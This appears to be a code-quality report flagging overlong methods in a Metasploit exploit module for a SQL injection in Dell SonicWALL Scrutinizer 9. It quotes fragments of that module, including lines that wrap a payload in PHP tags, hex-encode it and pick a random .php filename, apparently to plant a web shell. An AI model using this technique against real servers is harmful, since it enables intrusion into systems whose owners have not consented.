modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
Method initialize
has 42 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info={})
super(update_info(info,
'Name' => "Dell SonicWALL (Plixer) Scrutinizer 9 SQL Injection",
'Description' => %q{
This module exploits a vulnerability found in Dell SonicWall Scrutinizer.
Method exploit
has 26 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
peer = "#{rhost}:#{rport}"
p = "<?php #{payload.encoded} ?>"
hex_payload = p.unpack("H*")[0]
php_fname = Rex::Text.rand_text_alpha(5) + ".php"